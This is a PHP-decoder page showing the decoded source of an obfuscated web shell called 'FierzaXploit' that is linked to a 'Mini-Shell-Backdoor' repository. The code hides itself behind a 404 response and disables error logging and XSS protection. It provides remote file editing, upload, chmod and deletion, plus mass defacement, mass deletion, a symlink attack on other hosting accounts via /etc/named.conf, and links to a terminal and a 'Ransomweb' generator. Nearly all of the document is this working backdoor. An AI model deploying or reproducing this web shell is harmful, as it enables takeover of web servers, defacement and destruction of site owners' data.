Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<pre><?php goto ONp0q; a43tW: @ini_set("\154\x6f\147\x5f\145\x72\x72\157\162\x73", FAL..
Decoded Output download
<pre><?php
goto ONp0q;
a43tW: @ini_set("log_errors", FALSE);
goto n8F9Q;
zp_1J: goto QArCp;
goto j70eg;
QFgk6: GSbYH: goto VOmNo;
YHCZ1: if ($_GET["aksi"] == "buatfile") { if (isset($_POST["buat"])) { $nama_file = $path . "/" . $_POST["nama_file"];
$isi_file = $_POST["isi"];
$buat_file = fopen($nama_file, "w");
fwrite($buat_file, $isi_file);
fclose($buat);
if (empty($buat)) { echo "<script>window.location='?path=" . $path . "';alert('Sukses!!!')</script>";
} else { echo "<script>window.location='?path=" . $path . "';alert('Gagal!!!')</script>";
} } echo "<div class="alert"> <center><h4 class="text-white">{Buat File }</h4></center> <form method="post" class="mt-3"> <div class="mb-3"> <label for="exampleFormControlInput1" class="text-white form-label">Nama File :</label> <input type="text" name="nama_file" placeholder="Masukkan Nama Filenya" class="form-control" id="exampleFormControlInput1" placeholder="[email protected]"> </div> <div class="mb-3"> <label for="exampleFormControlTextarea1" class="text-white form-label">Isi File :</label> <textarea class="form-control" name="isi" placeholder="Masukkan Isi Filenya" id="exampleFormControlTextarea1" rows="3"></textarea> </div><br> <button name="buat" class="tombol btn btn-outline-success" type="submit">Create Now</button> </form> <br> <button type="button" class="tombol btn btn-danger" data-bs-dismiss="alert" aria-label="Close">Cancel</button> </div> <br>";
} goto zp_1J;
tXnxf: goto FY1gj;
goto ggFSH;
oLCZa: goto wZKeE;
goto KQsIO;
HjlHJ: goto Yp2Rw;
goto JAl6s;
XXtIF: @ini_set("max_execution_time", FALSE);
goto sAzXs;
D3IVi: ?>
<li>Browser : <?php goto fth0D;
yskXd: qKC2R: goto EOI1o;
t1EEk: goto fhkhs;
goto KE1J6;
pEM73: echo date("Y") . "</p>";
goto o3y5R;
CsyHM: goto pJJz_;
goto eAO7y;
DHpGE: goto WVZ9c;
goto QFgk6;
AfZqn: goto qwXuj;
goto PNGUy;
vHTML: goto D2lid;
goto Li6uM;
jVoof: JDEDT: goto lYoN0;
Y9kzk: zCF_D: goto Z1imX;
AZYII: goto umLDt;
goto AafvC;
ewiuS: x7V9J: goto peaET;
QWcEH: rVp60: goto MiQTU;
ONp0q: goto NiTi4;
goto O7Une;
OuGV8: function browsernya() { $browser = '';
if (strpos($_SERVER["HTTP_USER_AGENT"], "Netscape")) { $browser = "Netscape";
echo $browser;
} else { if (strpos($_SERVER["HTTP_USER_AGENT"], "Firefox")) { $browser = "Mozilla Firefox";
echo $browser;
} else { if (strpos($_SERVER["HTTP_USER_AGENT"], "Chrome")) { $browser = "Google Chrome";
echo $browser;
} else { if (strpos($_SERVER["HTTP_USER_AGENT"], "Opera")) { $browser = "Opera";
echo $browser;
} else { if (strpos($_SERVER["HTTP_USER_AGENT"], "MSIE")) { $browser = "Internet Explorer";
echo $browser;
} else { $browser = "Lainnya";
echo $browser;
} } } } } } goto Xks96;
i902r: if ($_GET["aksi"] == "rename") { if (isset($_POST["rename_now"])) { $new_name = $_POST["newname"];
$rename_file = rename($new_name, $_GET["nama_file"]);
if (file_exists($rename_file)) { echo "<script>alert('Nama File Sudah Digunakan')</script>";
} else { if (rename($_GET["nama_file"], $new_name)) { echo "<script>window.location="?path=" . $path . "";alert("Sukses Mengganti Nama");</script>";
} else { echo "<script>window.location='?path=" . $path . "';alert('Maaf Anda gagal Merename');</script>";
} } } echo "<div class="alert"> <form method="POST"> <div class="mb-3"> <label for="exampleFormControlInput1" class="text-white form-label">Name File/Directory</label> <input name="newname" type="text" class="form-control" id="exampleFormControlInput1" value="" . $_GET["nama_file"] . "" placeholder="New Name"> </div> <br> <input type="submit" name="rename_now" value="Rename Now" class="tombol btn btn-outline-secondary btn-block"> </form> <br><br> <button type="button" class="tombol btn btn-danger" data-bs-dismiss="alert" aria-label="Close">Cancel</button> </div>";
} goto tXnxf;
g40jp: goto EZ0tt;
goto ewiuS;
FjoTC: goto krG0X;
goto R14mp;
AFxID: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true;
echo " <a class="path" href="?path=/">/</a></li>";
continue;
} if ($pat == '') { continue;
} echo "<a href="?path=";
for ($i = 0;
$i <= $id;
$i++) { echo "{$paths[$i]}";
if ($i != $id) { echo "/";
} } echo "" class="path">" . $pat . "</a>/";
} goto VpPyx;
XjuP4: TkSsH: goto hfxx6;
uJEM8: ?>
</li> <li> <?php goto MLTcG;
zSzYi: ZusWR: goto S4peE;
MLTcG: goto haaxP;
goto uuJvA;
uZ2py: QW2AR: goto C9Nhm;
Csfjc: echo " <form method="post" enctype="multipart/form-data"> <div class="uploader file input-group input-group-sm mb-3 ms-auto"> <input type="file" name="upl" class="form-control" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload"> <button name="btn" class="btn btn-secondary" type="submit" id="inputGroupFileAddon04"><i class="bi bi-cloud-upload-fill"></i> Upload</button> </div> </form> <!-- tambah file/folder & ransomweb --> <div class="tambah"> <div class="container-fluid"> <center> <div class="row row-cols-4"> <!-- tambah file --> <div class="col"> <a class="path" href="?path=" . $path . "&aksi=buatfile"><font size="5"><i class="bi bi-file-earmark-plus-fill"></i></font> File</a> </div> <!-- akhir tambah file --> <!-- tambah folder --> <div class="col"> <a class="path" href="?path=" . $path . "&aksi=buatfolder"><font size="5"><i class="bi bi-folder-plus"></i></font> Folder</a> </div> <!-- Akhir tambah folder --> <!-- terminal --> <div class="col"> <a class="path" href="?path=" . $path . "&aksi=terminal"><font size="5"><i class="bi bi-terminal"></i></font> Terminal</a> </div> <!-- Akhir terminal --> <!-- auto create ransomweb --> <div class="col"> <a class="path" href="?path=" . $path . "&aksi=buatransom"><font size="5"><i class="bi bi-file-earmark-lock2-fill"></i></font> Ransom<br>web</a> </div> <!-- akhir auto create ransomweb --> </div> </center> </div> </div> <!-- akhir tambah file/folder & ransomweb -->";
goto WAgQg;
R14mp: qTXxQ: goto QH3W5;
fPtSX: goto sr1jj;
goto VKjnB;
Lm29W: ?>
<!doctype html> <html id="up" lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"/> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"> <link class="img-thumbnail" rel="shortcut icon" href="https://i.ibb.co/4f3J9h0/guy-fawkes-mask.png" /> <title>FierzaXploit</title> <style> body {width: 100%;
text-decoration: none;
overflow-x: hidden !important;
color: black!important;
width: 100%;
}.shell {width: 100%;
}.pembatas{margin-top: 123px !important;
}.gambar{width: 100px;
height: 100px;
}.tulisan {color: #fff;
font-size: 12pt;
margin-top: 15px;
text-decoration: none;
}.path {color: #fff;
font-size: 12pt;
text-decoration: none;
}.path:hover {color: #c2c7d6;
}.info {color: #fff;
font-size: 12pt;
text-decoration: none;
margin-top: -50px;
}.navbar .nav-link {color: #fff !important;
text-decoration: none;
font-size: 12pt;
margin-top: 10px;
}.navbar-brand {padding-top: 15px;
color: #fff !important;
text-decoration: none;
}.file {width: 90%;
}.uploader {background: 0 0 !important;
color: #fff;
}.menu {margin-top: 15px;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.tutup {z-index: 999 !important;
margin-top: -10px !important;
visibility: visible !important;
}.bgnya {background-color: transparent;
visibility: hidden;
}.lihat {visibility: visible !important;
width: 126% !important;
margin-top: -20px;
margin-left: -30px;
}.tools {visibility: visible;
margin-top: -3px;
}.tambah {margin-top: 20px;
margin-bottom: 20px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 90%;
}.klik {width: 45%;
color: #fff;
}::marker {color: #f5f5f5;
size: 100px !important;
}.pathnya {margin-top: -10px;
}.tablenya {overflow-x: scroll;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color: white;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}.information-server{margin-bottom: -17px;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}@media (min-width: 768px) {body {text-decoration: none;
overflow-x: hidden;
color: #fff;
width: 100%;
}.shell {width: 100%;
}.uploader {background: 0 0 !important;
color: #fff;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.tutup {z-index: 999 !important;
margin-top: -10px !important;
visibility: visible !important;
margin-left: -10px;
}.bgnya {background-color: transparent;
visibility: hidden;
}.lihat {visibility: visible !important;
width: 112% !important;
margin-top: -20px;
margin-left: -30px;
}.tambah {margin-top: 30px;
margin-bottom: 25px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 30%;
}.klik {width: 50%;
color: #fff;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color:white;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}}@media (min-width: 992px) {body {color: #fff;
overflow-x: hidden !important;
text-decoration: none;
width: 100%;
}.shell{width: 100%;
}.pembatas{margin-top: 11px !important;
}.uploader {background: 0 0 !important;
color: #fff;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.file {width: 30%;
}.tools {visibility: hidden;
margin-left: -38px;
}.tambah {margin-top: 30px;
margin-bottom: 25px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 30%;
}.klik {width: 50%;
color: #fff;
}.about {margin-left: 6px;
}.tablenya {overflow: auto !important;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color:black;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}}</style> <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script> </head> <body class="bg-dark animate__animated animate__fadeIn"> <br> <div class="shell container-fluid"> <center><<img class="gambar bg-dark border-dark" src="https://i.ibb.co/Z615hHn/guy-fawkes-mask.png" alt="" width="45" height="45" class="d-inline-block align-text-top"><br><label for="exampleFormControlInput1" class="text-white form-label">- FierzaXploit -<br>Simple,Responsive & Powerfull</label></center> <!-- navbar --> <nav class="navbar navbar-expand-lg navbar-light bg-dark"> <div class="container-fluid"> <h4 class="navbar-brand"> <b>{FierzaXploit }</b></br> </h4> <button class="btn btn-dark" type="button" data-bs-toggle="offcanvas" data-bs-target="#offcanvasExample" aria-controls="offcanvasExample"> <b><font><i class="bi bi-menu-up"></i></font> Menu</b> </button> <div class="offcanvas offcanvas-start" tabindex="-1" id="offcanvasExample" aria-labelledby="offcanvasExampleLabel"> <div class="offcanvas-header"> <h5 class="offcanvas-title" id="offcanvasExampleLabel"><b><font><i class="bi bi-menu-up"></i></font> Menu</b></h5> <button type="button" class="btn-close text-reset" data-bs-dismiss="offcanvas" aria-label="Close"></button> </div> <div class="offcanvas-body"> <div class="dropdown mt-3"> <button class="btn btn-light dropdown-toggle" type="button" id="dropdownMenuButton" data-bs-toggle="dropdown"> <i class="bi bi-gear-wide-connected"></i> Our Tools </button> <ul class="dropdown-menu" aria-labelledby="navbarDropdownMenuLink"> <li> <?php goto eRzg6;
xDPWm: NxF52: goto sbIS7;
tpRGg: if ($_GET["aksi"] == "edit") { if (isset($_POST["save"])) { $fp = fopen($_GET["dirf"], "w");
$hasil = fwrite($fp, $_POST["src"]);
if ($hasil) { echo "<script>window.location='?path=" . $path . "';alert('Selamat Anda Berhasil Meng-edit File');</script>";
} else { echo "<script>window.location='?path=" . $path . "';alert('Maaf Anda Gagal Meng-edit File');</script>";
} } echo "<div class='container alert'> <center><h4 class="text-white">{Edit File }</h4></center> <form method='POST'> <div class="mb-3"> <label for="exampleFormControlTextarea1" class="text-white form-label">Code :</label> <textarea class="form-control" id="exampleFormControlTextarea1" rows="20" name="src">" . htmlspecialchars(file_get_contents($_GET["dirf"])) . "</textarea><a href="?Home" type="button" class="tutup btn-close" data-bs-dismiss="alert" aria-label="Close"></a> </div> <button name="save" class="tombol btn btn-outline-secondary" type="submit">Simpan</button> </form> <br> <button type="button" class="tombol btn btn-danger" data-bs-dismiss="alert" aria-label="Close">Cancel</button> </div>";
} goto Pm5Bg;
V0tPI: aMmZL: goto Lm29W;
EOI1o: if ($_GET["aksi"] == "massdel") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}");
} } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}");
} } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi} > Terhapus
";
unlink($lokasi);
$massdel = hapus_massal($dirc, $namafile);
} } } } } } } if ($_POST["start"]) { echo "<textarea class='form-control' rows='8' disabled='disabled'>";
hapus_massal($_POST["d_dir"], $_POST["d_file"]);
echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>";
} else { echo "<center><p>{Mass Delete }</p></center> <form method='post'> <p><i class='fa fa-folder'></i> Lokasi</p> <input type='text' name='d_dir' value='{$dir}' class='form-control'><br> <p><i class ='fa fa-file'></i> Nama File</p> <input type='text' name='d_file' placeholder='index.php' class='form-control'><br> <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'> <br><br> </form>";
} } goto XQB_K;
XoW0k: goto z5WeP;
goto mc16c;
IptFT: $path = str_replace("\", "/", $path);
goto O5nm1;
u9i_V: ?>
</li> </div> </div> </div> <?php goto AZYII;
xfMt2: goto zCF_D;
goto bdWeU;
Ybt26: echo "<font color='white' size='5'><a class='text-white text-decoration-none' href='https://github.com/FierzaEriez/Mini-Shell-Backdoor'><i class="bi bi-github"></i></a> <i class="bi bi-facebook"></i> <i class="bi bi-instagram"></i></font><font color='white'><hr width='55%'></font><br><br><p class="info">Design & Developed By FierzaXploit <br> Copyright ©";
goto gDINn;
bdWeU: TVTRq: goto ylXBo;
A5_JB: goto NxF52;
goto Y9kzk;
evrxU: goto UPaVK;
goto cLP65;
EnfMF: if ($_GET["aksi"] == "delete") { if (is_dir($_GET["dirf"])) { if (is_writable($path)) { rmdir($_GET["nama_file"]);
echo "<script>alert('Selamat Anda Berhasil Men-delete Folder');window.location='?path=" . $path . "'</script>";
} else { echo "<script>alert('Maaf Anda Gagal Men-delete Folder')</script>";
} } if (is_file($_GET["dirf"])) { if (unlink($_GET["nama_file"])) { echo "<script>alert('Selamat Anda Berhasil Men-delete File');window.location='?path=" . $path . "';</script>";
} else { echo "<script>alert('Maaf Anda Gagal Men-delete File');window.location='?path=" . $path . "';</script>";
} } } goto AfZqn;
gmSid: goto vM0sT;
goto hWKWE;
pyHpb: iY62q: goto hS0Pn;
sbIS7: if ($_GET["aksi"] == "symlink") { if (!is_file("named.txt")) { $d00m = @file("/etc/named.conf");
} else { $d00m = @file("named.txt");
} if (!$d00m) { echo "<center> <br/> <font color='red'>Gagal Membaca /etc/named.conf</font> <br/><br/></center>";
} else { echo "<center> <div class='tmp'></center> <table align='center' width='100%'> <thead class='bg-info'> <th>Domains</th> <th>Users</th> <th>symlink </th> </thead>";
foreach ($d00m as $dom) { if (eregi("zone", $dom)) { preg_match_all("#zone "(.*)"#", $dom, $domsws);
flush();
if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domsws[1][0]));
flush();
$site = $user["name"];
@symlink("/", "sym/root");
$site = $domsws[1][0];
$ir = "ir";
$il = "il";
if (preg_match("/.^{$ir}/", $domsws[1][0]) or preg_match("/.^{$il}/", $domsws[1][0])) { $site = ".{$domsws["1"]}[0].";
} echo " <tr> <td> <a target='_blank' href=http://www." . $domsws[1][0] . "/>" . $site . " </a> </td> <td> " . $user["name"] . " </td> <td> <a href='sym/root/home/" . $user["name"] . "/public_html' target='_blank'>Symlink</a> </td> </tr>";
flush();
flush();
} } } echo "</table> </div><br><br>";
} } goto dHbjl;
eAO7y: AauIZ: goto Y4BNk;
z4nNL: kADJW: goto IorZ4;
PNGUy: UWzQG: goto tX3bQ;
sT0Km: goto qtcK6;
goto l9LlZ;
sI5sQ: if ($_GET["aksi"] == "massdeface") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") { file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script);
} else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Berhasil => {$lokasi}\xa";
file_put_contents($lokasi, $isi_script);
$MassDeface = tipe_massal($dirc, $namafile, $isi_script);
} } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir);
foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}";
$lokasi = $dirc . "/" . $namafile;
if ($dirb === ".") { file_put_contents($lokasi, $isi_script);
} elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script);
} else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Berhasil => {$dirb}/{$namafile}
";
file_put_contents($lokasi, $isi_script);
} } } } } } if ($_POST["start"]) { echo "<textarea class='form-control' rows='8' disabled='disabled'>";
if ($_POST["tipe"] == "mahal") { tipe_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
} elseif ($_POST["tipe"] == "murah") { tipe_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]);
} echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>";
} else { echo "<form method='post'> <center> <p>{Mass Deface }</p> <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked> <label for='toggle-on' class='butn'>Biasa</label> <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'> <label for='toggle-off' class='butn'>Masal</label> </center><hr> <p><i class='fa fa-folder'></i> Lokasi</p> <input type='text' name='d_dir' value='{$dir}' class='form-control'><br> <p><i class ='fa fa-file'></i> Nama File</p> <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/> <p><i class ='fa fa-file'></i> Isi File</p> <textarea name='script' class='form-control' rows='5' placeholder='Hacked By Mr.MF33'></textarea><br/> <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/> <br><br> </form>";
} } goto HjlHJ;
fth0D: goto Bec33;
goto K9M6v;
oa08o: goto TkSsH;
goto NHUP1;
o3y5R: goto x7V9J;
goto PV003;
KQsIO: P0QKh: goto XXtIF;
ey9Tt: Ck2ZP: goto pEM73;
uuJvA: WDevt: goto nh8w_;
hS0Pn: ob_start();
goto xfMt2;
tX3bQ: if ($_GET["aksi"] == "chmod") { if (isset($_POST["ganti"])) { if (chmod($_GET["nama_file"], $_POST["perm"])) { echo "<script>window.location='?path=" . $path . "';alert('Sukses')</script>";
} else { echo "<script>window.location='?path=" . $path . "';alert('Gagal!!!')</script>";
} } echo "<div class="alert"><center><h4 class="text-white">{Ganti Permission }</h4></center> <form method="POST"> <div class="mb-3"> <label for="exampleFormControlInput1" class="text-white form-label">Permission :</label> <input type="text" name="perm" value="" . substr(sprintf("%o", fileperms($_GET["dirf"])), -4) . "" class="form-control" id="exampleFormControlInput1" placeholder="[email protected]"> </div> <br> <button type="submit" name="ganti" class="tombol btn btn-outline-success">Ganti Permission</button> </form> <br><br> <button type="button" class="tombol btn btn-danger" data-bs-dismiss="alert" aria-label="Close">Cancel</button> </div>";
} goto Rn05R;
IorZ4: $paths = explode("/", $path);
goto uqYo2;
nh8w_: function perms($file) { $perms = fileperms($file);
if (($perms & 49152) == 49152) { $info = "s";
} elseif (($perms & 40960) == 40960) { $info = "l";
} elseif (($perms & 32768) == 32768) { $info = "-";
} elseif (($perms & 24576) == 24576) { $info = "b";
} elseif (($perms & 16384) == 16384) { $info = "d";
} elseif (($perms & 8192) == 8192) { $info = "c";
} elseif (($perms & 4096) == 4096) { $info = "p";
} else { $info = "u";
} $info .= $perms & 256 ? "r" : "-";
$info .= $perms & 128 ? "w" : "-";
$info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-");
$info .= $perms & 32 ? "r" : "-";
$info .= $perms & 16 ? "w" : "-";
$info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-");
$info .= $perms & 4 ? "r" : "-";
$info .= $perms & 2 ? "w" : "-";
$info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-");
return $info;
} goto B9Mtr;
cLP65: ifBFV: goto XxW0A;
eiA1e: boQRQ: goto J933R;
ixusX: if (!empty($_GET["path"])) { chdir($_GET["path"]);
} goto W9V0V;
B9Mtr: goto UWzQG;
goto dhclf;
PV003: z5WeP: goto Hoewp;
D4tz1: D2lid: goto IptFT;
S4peE: echo "<p class="home"><a class="linknya" href="?home">{Home }</a></p>";
goto A5_JB;
Nvrz7: ut1ym: goto EtjOg;
ziddK: goto TVTRq;
goto Nvrz7;
JAl6s: wZKeE: goto WuftL;
zbBRb: if (isset($_GET["path"])) { $path = $_GET["path"];
} else { $path = getcwd();
} goto vHTML;
NbROV: echo "<a class="dropdown-item" href="?path=" . $path . "&aksi=massdeface">Mass Deface</a>";
goto F73IM;
C9Nhm: foreach ($scandir as $file) { if ($file != "." && $file != "..") { if (is_file($file)) { echo "<tr> <th scope="row"><font size='5'><i class="bi bi-file-earmark-code-fill"></i></font></th> <td> <a class="path" nama='filenya' href="?path=" . $path . "&aksi=view&path_file=" . $path . "/" . $file . "">" . $file . "</a> </td> <td>";
if (is_writable($path . "/" . $file)) { echo "<font color="#2EFF00">";
} elseif (!is_readable($path . "/" . $file)) { echo "<font color="#FF5733">";
} echo perms($path . "/" . $file);
if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>";
} echo "</td> <td> <a href='?path=" . $path . "&aksi=edit&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class="btn btn-outline-success"><i class="bi bi-pencil-square"></i></a> <a href='?path=" . $path . "&aksi=rename&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class="btn btn-outline-warning"><i class="bi bi-pencil"></i></a> <a href='?path=" . $path . "&aksi=chmod&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class="btn btn-outline-light"><i class="bi bi-cursor-fill"></i></a> <a href='?path=" . $path . "&aksi=delete&dirf=" . $path . "/" . $file . "&nama_file=" . $file . "' class="btn btn-outline-danger"><i class="bi bi-trash-fill"></i></a> </td> </tr>";
} } } goto t1EEk;
Xks96: goto GSbYH;
goto HPrZx;
Dazrs: if (isset($_GET["path_file"])) { $lihat = $_GET["path_file"];
} goto XoW0k;
uqYo2: goto Dj2VZ;
goto YjoII;
Sw8t6: goto JqRah;
goto ey9Tt;
sAzXs: goto JxNsu;
goto zWXy7;
Y4BNk: ?>
</li> <li> <?php goto FjoTC;
jF2FQ: goto ut1ym;
goto zSzYi;
Hoewp: if ($_GET["aksi"] == "view") { echo "<div class='alert'><button type="button" class="btn btn-danger" data-bs-dismiss="alert" aria-label="Close"><i class="bi bi-x-lg"></i></button><center><textarea class="form-control prettyPrint" id="exampleFormControlTextarea1" rows="20" disabled>" . htmlspecialchars(file_get_contents($lihat)) . "</textarea></center></div>";
} goto exB7J;
XQB_K: goto dStM1;
goto xDPWm;
k9_qn: sr1jj: goto Csfjc;
wTLL7: $scandir = scandir($path);
goto CsyHM;
W9V0V: goto aMmZL;
goto QWcEH;
FF9z1: Bec33: goto VcNbZ;
exB7J: goto SyNz4;
goto RQoJM;
NHUP1: vM0sT: goto C99NJ;
Kgiy1: krG0X: goto NbROV;
MCkMB: qtcK6: goto Ybt26;
Z1imX: set_time_limit(0);
goto luNKG;
zvSdf: goto jXWMb;
goto JDWNg;
VOmNo: echo " <a class="information-server text-decoration-none text-white text-start bg-dark" data-bs-toggle="collapse" href="#collapseExample" role="button" aria-expanded="false" aria-controls="collapseExample"> <p><i class="bi bi-info-circle-fill"></i> Information Server <i class="bi bi-chevron-down"></i></p> </a> <div class="collapse" id="collapseExample"> <div class="card card-body bg-dark"> <div class="text-white bg-dark tablenya"> <li>Website : " . $_SERVER["SERVER_NAME"] . "</li> <li>Ip Address : " . $_SERVER["SERVER_ADDR"] . "</li> <li>Port : " . $_SERVER["SERVER_PORT"] . "</li> <li>Kernel : " . php_uname() . "</li> <li>Protokol : " . $_SERVER["SERVER_PROTOCOL"] . "</li> <li>Save Data : " . $_SERVER["HTTP_SAVE_DATA"] . "</li> <li>Koneksi : " . $_SERVER["HTTP_CONNECTION"] . "</li> <li>Server : " . $_SERVER["SERVER_SOFTWARE"] . "</li> <li>Root : " . $_SERVER["DOCUMENT_ROOT"] . "</li> <li>G-Interface : " . $_SERVER["GATEWAY_INTERFACE"] . "</li> <li>R-Method : " . $_SERVER["REQUEST_METHOD"] . "</li> ";
goto pYHSB;
O7Une: Dj2VZ: goto Z2kIu;
hfxx6: foreach ($scandir as $direktori) { if ($direktori != "." && $direktori != "..") { if (is_dir($direktori)) { echo "<tr> <th scope="row"><font size='5'><i class="bi bi-folder-fill"></i></font></th> <td><a class="path" nama='filenya' href="?path=" . $path . "/" . $direktori . "">" . $direktori . "</a></td> <td>";
if (is_writable($path . "/" . $direktori)) { echo "<font color="#2EFF00">";
} elseif (!is_readable($path . "/" . $direktori)) { echo "<font color="#FF5733">";
} echo perms($path . "/" . $direktori);
if (is_writable($path . "/" . $direktori) || !is_readable($path . "/" . $direktori)) { echo "</font>";
} echo "</td> <td> <a href='?path=" . $path . "&aksi=rename&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class="btn btn-outline-warning"><i class="bi bi-pencil"></i></a> <a href='?path=" . $path . "&aksi=chmod&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class="btn btn-outline-light"><i class="bi bi-cursor-fill"></i></a> <a href='?path=" . $path . "&aksi=delete&dirf=" . $path . "/" . $direktori . "&nama_file=" . $direktori . "' class="btn btn-outline-danger"><i class="bi bi-trash-fill"></i></a> </td> </tr>";
} } } goto uGQc2;
n_8YG: goto rVp60;
goto jVoof;
N4ulc: goto iY62q;
goto AXcgL;
ggFSH: NiTi4: goto a7kqj;
CWGHy: dStM1: goto sI5sQ;
WuftL: echo " <font width='15%'><a class="btn btn-outline-success"><i class="bi bi-pencil-square"></i></a> : Edit File</font> <font width='15%'><a class="btn btn-outline-warning"><i class="bi bi-pencil"></i></a> : rename File</font> <font width='15%'><a class="btn btn-outline-light"><i class="bi bi-cursor-fill"></i></a> : Chmod File</font> <font width='15%'><a class="btn btn-outline-danger"><i class="bi bi-trash-fill"></i></a> : Delete File</font> ";
goto gmSid;
hWKWE: UPaVK: goto OuGV8;
j70eg: AGQ7r: goto uJEM8;
KFC7Z: FKIcX: goto D3IVi;
zWXy7: JqRah: goto YHCZ1;
VpPyx: goto ZusWR;
goto Mpn4G;
WAgQg: goto wPmco;
goto CJtzJ;
C99NJ: ?>
</div> </div> </caption> </table> <a href="#up"><i class="bi bi-chevron-up up-icon"></i></a> </div> </div> <!-- akhir list file/folder --> <br> <div class="footer"> <center> <?php goto sT0Km;
RQoJM: wPmco: goto oWvqN;
zT5IZ: echo "<a class="dropdown-item" href="?path=" . $path . "&aksi=symlink">Symlink</a>";
goto ziddK;
Pm5Bg: goto WDevt;
goto uZ2py;
Z2kIu: echo "<p class='tulisan tablenya'><i size='15' class="pathnya bi bi-folder2-open"></i> : ~ ";
goto DHpGE;
AafvC: ohgyw: goto yVK2Z;
J933R: echo "<a class="dropdown-item" href="?path" . $path . "&aksi=massdel">Mass Delete</a>";
goto s2CZX;
a7kqj: header("X-XSS-Protection: 0");
goto N4ulc;
HPrZx: Yp2Rw: goto bK3Zu;
iJL_x: goto oSCCZ;
goto aLb0r;
uGQc2: goto QW2AR;
goto pyHpb;
pYHSB: goto FKIcX;
goto XjuP4;
eRzg6: goto boQRQ;
goto z4nNL;
EtjOg: http_response_code(404);
goto etrN_;
VcNbZ: browsernya();
goto g40jp;
lkO2O: ?>
</tbody> <caption> <a class="btn btn-dark" data-bs-toggle="collapse" href="#collapseExample1" role="button" aria-expanded="false" aria-controls="collapseExample"> <i class="bi bi-question-circle"></i> Legends <i class="bi bi-chevron-down"></i> </a> <div class="collapse" id="collapseExample1"> <div class="card card-body bg-dark text-white"> <?php goto oLCZa;
luNKG: goto AL7F1;
goto MCkMB;
O5nm1: goto kADJW;
goto eiA1e;
n8F9Q: goto P0QKh;
goto Kgiy1;
t550g: error_reporting(0);
